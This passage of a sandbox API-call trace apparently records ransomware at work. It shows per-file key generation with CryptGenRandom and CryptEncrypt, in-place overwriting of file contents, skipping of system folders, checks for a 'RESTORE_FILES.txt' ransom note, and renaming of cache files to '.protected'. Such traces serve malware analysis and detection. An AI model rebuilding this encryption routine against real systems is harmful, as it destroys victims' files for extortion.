HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\5080DC7A65DB6A5960ECD874088F3328_2908F682DFC81A793BD240CF29711C77") returned 152 [0088.980] StrStrW (lpFirst="5080DC7A65DB6A5960ECD874088F3328_2908F682DFC81A793BD240CF29711C77", lpSrch=".zip") returned 0x0 [0088.980] ReadFile (in: hFile=0x150, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295e7b4*=0x194, lpOverlapped=0x0) returned 1 [0088.981] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xfffffe6c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0088.981] WriteFile (in: hFile=0x150, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x194, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295e7b4*=0x194, lpOverlapped=0x0) returned 1 [0088.981] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.981] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0088.981] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0088.981] CloseHandle (hObject=0x150) returned 1 [0088.981] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\5080DC7A65DB6A5960ECD874088F3328_2908F682DFC81A793BD240CF29711C77.protected") returned 162 [0088.981] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\5080DC7A65DB6A5960ECD874088F3328_2908F682DFC81A793BD240CF29711C77" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\5080dc7a65db6a5960ecd874088f3328_2908f682dfc81a793bd240cf29711c77"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\5080DC7A65DB6A5960ECD874088F3328_2908F682DFC81A793BD240CF29711C77.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\5080dc7a65db6a5960ecd874088f3328_2908f682dfc81a793bd240cf29711c77.protected")) returned 1 [0088.982] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0088.982] lstrcmpiW (lpString1="5080DC7A65DB6A5960ECD874088F3328_6CBA2C06D5985DD95AE59AF8FC7C6220", lpString2="Windows") returned -1 [0088.982] lstrcmpiW (lpString1="5080DC7A65DB6A5960ECD874088F3328_6CBA2C06D5985DD95AE59AF8FC7C6220", lpString2="Program Files") returned -1 [0088.982] lstrcmpiW (lpString1="5080DC7A65DB6A5960ECD874088F3328_6CBA2C06D5985DD95AE59AF8FC7C6220", lpString2="Program Files (x86)") returned -1 [0088.982] lstrcmpiW (lpString1="5080DC7A65DB6A5960ECD874088F3328_6CBA2C06D5985DD95AE59AF8FC7C6220", lpString2="$Recycle.bin") returned 1 [0088.982] lstrcmpiW (lpString1="5080DC7A65DB6A5960ECD874088F3328_6CBA2C06D5985DD95AE59AF8FC7C6220", lpString2="System Volume Information") returned -1 [0088.982] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\5080DC7A65DB6A5960ECD874088F3328_6CBA2C06D5985DD95AE59AF8FC7C6220") returned 152 [0088.982] StrStrIW (lpFirst="5080DC7A65DB6A5960ECD874088F3328_6CBA2C06D5985DD95AE59AF8FC7C6220", lpSrch=".protected") returned 0x0 [0088.982] lstrcmpW (lpString1="5080DC7A65DB6A5960ECD874088F3328_6CBA2C06D5985DD95AE59AF8FC7C6220", lpString2="RESTORE_FILES.txt") returned -1 [0088.982] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0088.982] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0088.983] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\5080DC7A65DB6A5960ECD874088F3328_6CBA2C06D5985DD95AE59AF8FC7C6220" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\5080dc7a65db6a5960ecd874088f3328_6cba2c06d5985dd95ae59af8fc7c6220"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0088.983] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\5080DC7A65DB6A5960ECD874088F3328_6CBA2C06D5985DD95AE59AF8FC7C6220") returned 152 [0088.983] StrStrW (lpFirst="5080DC7A65DB6A5960ECD874088F3328_6CBA2C06D5985DD95AE59AF8FC7C6220", lpSrch=".txt") returned 0x0 [0088.983] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\5080DC7A65DB6A5960ECD874088F3328_6CBA2C06D5985DD95AE59AF8FC7C6220") returned 152 [0088.984] StrStrW (lpFirst="5080DC7A65DB6A5960ECD874088F3328_6CBA2C06D5985DD95AE59AF8FC7C6220", lpSrch=".rar") returned 0x0 [0088.984] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\5080DC7A65DB6A5960ECD874088F3328_6CBA2C06D5985DD95AE59AF8FC7C6220") returned 152 [0088.984] StrStrW (lpFirst="5080DC7A65DB6A5960ECD874088F3328_6CBA2C06D5985DD95AE59AF8FC7C6220", lpSrch=".zip") returned 0x0 [0088.984] ReadFile (in: hFile=0x150, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295e7b4*=0x190, lpOverlapped=0x0) returned 1 [0088.985] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xfffffe70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0088.985] WriteFile (in: hFile=0x150, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x190, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295e7b4*=0x190, lpOverlapped=0x0) returned 1 [0088.985] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.985] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0088.985] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0088.985] CloseHandle (hObject=0x150) returned 1 [0088.985] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\5080DC7A65DB6A5960ECD874088F3328_6CBA2C06D5985DD95AE59AF8FC7C6220.protected") returned 162 [0088.985] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\5080DC7A65DB6A5960ECD874088F3328_6CBA2C06D5985DD95AE59AF8FC7C6220" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\5080dc7a65db6a5960ecd874088f3328_6cba2c06d5985dd95ae59af8fc7c6220"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\5080DC7A65DB6A5960ECD874088F3328_6CBA2C06D5985DD95AE59AF8FC7C6220.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\5080dc7a65db6a5960ecd874088f3328_6cba2c06d5985dd95ae59af8fc7c6220.protected")) returned 1 [0088.986] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0088.986] lstrcmpiW (lpString1="5457A8CE4B2A7499F8299A013B6E1C7C_CE50F893881D43DC0C815E4D80FAF2B4", lpString2="Windows") returned -1 [0088.986] lstrcmpiW (lpString1="5457A8CE4B2A7499F8299A013B6E1C7C_CE50F893881D43DC0C815E4D80FAF2B4", lpString2="Program Files") returned -1 [0088.986] lstrcmpiW (lpString1="5457A8CE4B2A7499F8299A013B6E1C7C_CE50F893881D43DC0C815E4D80FAF2B4", lpString2="Program Files (x86)") returned -1 [0088.986] lstrcmpiW (lpString1="5457A8CE4B2A7499F8299A013B6E1C7C_CE50F893881D43DC0C815E4D80FAF2B4", lpString2="$Recycle.bin") returned 1 [0088.986] lstrcmpiW (lpString1="5457A8CE4B2A7499F8299A013B6E1C7C_CE50F893881D43DC0C815E4D80FAF2B4", lpString2="System Volume Information") returned -1 [0088.986] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\5457A8CE4B2A7499F8299A013B6E1C7C_CE50F893881D43DC0C815E4D80FAF2B4") returned 152 [0088.986] StrStrIW (lpFirst="5457A8CE4B2A7499F8299A013B6E1C7C_CE50F893881D43DC0C815E4D80FAF2B4", lpSrch=".protected") returned 0x0 [0088.986] lstrcmpW (lpString1="5457A8CE4B2A7499F8299A013B6E1C7C_CE50F893881D43DC0C815E4D80FAF2B4", lpString2="RESTORE_FILES.txt") returned -1 [0088.986] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0088.986] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0088.986] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\5457A8CE4B2A7499F8299A013B6E1C7C_CE50F893881D43DC0C815E4D80FAF2B4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\5457a8ce4b2a7499f8299a013b6e1c7c_ce50f893881d43dc0c815e4d80faf2b4"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0088.987] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\5457A8CE4B2A7499F8299A013B6E1C7C_CE50F893881D43DC0C815E4D80FAF2B4") returned 152 [0088.987] StrStrW (lpFirst="5457A8CE4B2A7499F8299A013B6E1C7C_CE50F893881D43DC0C815E4D80FAF2B4", lpSrch=".txt") returned 0x0 [0088.987] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\5457A8CE4B2A7499F8299A013B6E1C7C_CE50F893881D43DC0C815E4D80FAF2B4") returned 152 [0088.987] StrStrW (lpFirst="5457A8CE4B2A7499F8299A013B6E1C7C_CE50F893881D43DC0C815E4D80FAF2B4", lpSrch=".rar") returned 0x0 [0088.987] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\5457A8CE4B2A7499F8299A013B6E1C7C_CE50F893881D43DC0C815E4D80FAF2B4") returned 152 [0088.987] StrStrW (lpFirst="5457A8CE4B2A7499F8299A013B6E1C7C_CE50F893881D43DC0C815E4D80FAF2B4", lpSrch=".zip") returned 0x0 [0088.987] ReadFile (in: hFile=0x150, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295e7b4*=0x18e, lpOverlapped=0x0) returned 1 [0088.988] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xfffffe72, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0088.988] WriteFile (in: hFile=0x150, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x18e, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295e7b4*=0x18e, lpOverlapped=0x0) returned 1 [0088.988] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.988] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0088.989] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0088.989] CloseHandle (hObject=0x150) returned 1 [0088.989] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\5457A8CE4B2A7499F8299A013B6E1C7C_CE50F893881D43DC0C815E4D80FAF2B4.protected") returned 162 [0088.989] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\5457A8CE4B2A7499F8299A013B6E1C7C_CE50F893881D43DC0C815E4D80FAF2B4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\5457a8ce4b2a7499f8299a013b6e1c7c_ce50f893881d43dc0c815e4d80faf2b4"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\5457A8CE4B2A7499F8299A013B6E1C7C_CE50F893881D43DC0C815E4D80FAF2B4.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\5457a8ce4b2a7499f8299a013b6e1c7c_ce50f893881d43dc0c815e4d80faf2b4.protected")) returned 1 [0088.990] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0088.990] lstrcmpiW (lpString1="696F3DE637E6DE85B458996D49D759AD", lpString2="Windows") returned -1 [0088.990] lstrcmpiW (lpString1="696F3DE637E6DE85B458996D49D759AD", lpString2="Program Files") returned -1 [0088.990] lstrcmpiW (lpString1="696F3DE637E6DE85B458996D49D759AD", lpString2="Program Files (x86)") returned -1 [0088.990] lstrcmpiW (lpString1="696F3DE637E6DE85B458996D49D759AD", lpString2="$Recycle.bin") returned 1 [0088.990] lstrcmpiW (lpString1="696F3DE637E6DE85B458996D49D759AD", lpString2="System Volume Information") returned -1 [0088.990] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\696F3DE637E6DE85B458996D49D759AD") returned 119 [0088.990] StrStrIW (lpFirst="696F3DE637E6DE85B458996D49D759AD", lpSrch=".protected") returned 0x0 [0088.990] lstrcmpW (lpString1="696F3DE637E6DE85B458996D49D759AD", lpString2="RESTORE_FILES.txt") returned -1 [0088.990] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0088.990] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0088.990] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\696F3DE637E6DE85B458996D49D759AD" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\696f3de637e6de85b458996d49d759ad"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0088.990] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\696F3DE637E6DE85B458996D49D759AD") returned 119 [0088.990] StrStrW (lpFirst="696F3DE637E6DE85B458996D49D759AD", lpSrch=".txt") returned 0x0 [0088.990] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\696F3DE637E6DE85B458996D49D759AD") returned 119 [0088.990] StrStrW (lpFirst="696F3DE637E6DE85B458996D49D759AD", lpSrch=".rar") returned 0x0 [0088.990] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\696F3DE637E6DE85B458996D49D759AD") returned 119 [0088.990] StrStrW (lpFirst="696F3DE637E6DE85B458996D49D759AD", lpSrch=".zip") returned 0x0 [0088.990] ReadFile (in: hFile=0x150, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295e7b4*=0xf4, lpOverlapped=0x0) returned 1 [0088.991] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xffffff0c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0088.991] WriteFile (in: hFile=0x150, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0xf4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295e7b4*=0xf4, lpOverlapped=0x0) returned 1 [0088.991] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.991] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0088.991] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0088.992] CloseHandle (hObject=0x150) returned 1 [0088.992] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\696F3DE637E6DE85B458996D49D759AD.protected") returned 129 [0088.992] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\696F3DE637E6DE85B458996D49D759AD" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\696f3de637e6de85b458996d49d759ad"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\696F3DE637E6DE85B458996D49D759AD.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\696f3de637e6de85b458996d49d759ad.protected")) returned 1 [0088.992] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0088.992] lstrcmpiW (lpString1="705A76DE71EA2CAEBB8F0907449CE086_9752C5B2D53EE7A19F7764B52968EC21", lpString2="Windows") returned -1 [0088.993] lstrcmpiW (lpString1="705A76DE71EA2CAEBB8F0907449CE086_9752C5B2D53EE7A19F7764B52968EC21", lpString2="Program Files") returned -1 [0088.993] lstrcmpiW (lpString1="705A76DE71EA2CAEBB8F0907449CE086_9752C5B2D53EE7A19F7764B52968EC21", lpString2="Program Files (x86)") returned -1 [0088.993] lstrcmpiW (lpString1="705A76DE71EA2CAEBB8F0907449CE086_9752C5B2D53EE7A19F7764B52968EC21", lpString2="$Recycle.bin") returned 1 [0088.993] lstrcmpiW (lpString1="705A76DE71EA2CAEBB8F0907449CE086_9752C5B2D53EE7A19F7764B52968EC21", lpString2="System Volume Information") returned -1 [0088.993] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\705A76DE71EA2CAEBB8F0907449CE086_9752C5B2D53EE7A19F7764B52968EC21") returned 152 [0088.993] StrStrIW (lpFirst="705A76DE71EA2CAEBB8F0907449CE086_9752C5B2D53EE7A19F7764B52968EC21", lpSrch=".protected") returned 0x0 [0088.993] lstrcmpW (lpString1="705A76DE71EA2CAEBB8F0907449CE086_9752C5B2D53EE7A19F7764B52968EC21", lpString2="RESTORE_FILES.txt") returned -1 [0088.993] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0088.993] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0088.993] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\705A76DE71EA2CAEBB8F0907449CE086_9752C5B2D53EE7A19F7764B52968EC21" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\705a76de71ea2caebb8f0907449ce086_9752c5b2d53ee7a19f7764b52968ec21"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0088.993] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\705A76DE71EA2CAEBB8F0907449CE086_9752C5B2D53EE7A19F7764B52968EC21") returned 152 [0088.993] StrStrW (lpFirst="705A76DE71EA2CAEBB8F0907449CE086_9752C5B2D53EE7A19F7764B52968EC21", lpSrch=".txt") returned 0x0 [0088.993] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\705A76DE71EA2CAEBB8F0907449CE086_9752C5B2D53EE7A19F7764B52968EC21") returned 152 [0088.993] StrStrW (lpFirst="705A76DE71EA2CAEBB8F0907449CE086_9752C5B2D53EE7A19F7764B52968EC21", lpSrch=".rar") returned 0x0 [0088.993] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\705A76DE71EA2CAEBB8F0907449CE086_9752C5B2D53EE7A19F7764B52968EC21") returned 152 [0088.993] StrStrW (lpFirst="705A76DE71EA2CAEBB8F0907449CE086_9752C5B2D53EE7A19F7764B52968EC21", lpSrch=".zip") returned 0x0 [0088.993] ReadFile (in: hFile=0x150, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295e7b4*=0x18e, lpOverlapped=0x0) returned 1 [0088.994] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xfffffe72, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0088.994] WriteFile (in: hFile=0x150, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x18e, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295e7b4*=0x18e, lpOverlapped=0x0) returned 1 [0088.995] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.995] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0088.995] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0088.995] CloseHandle (hObject=0x150) returned 1 [0088.995] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\705A76DE71EA2CAEBB8F0907449CE086_9752C5B2D53EE7A19F7764B52968EC21.protected") returned 162 [0088.995] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\705A76DE71EA2CAEBB8F0907449CE086_9752C5B2D53EE7A19F7764B52968EC21" (normalized: 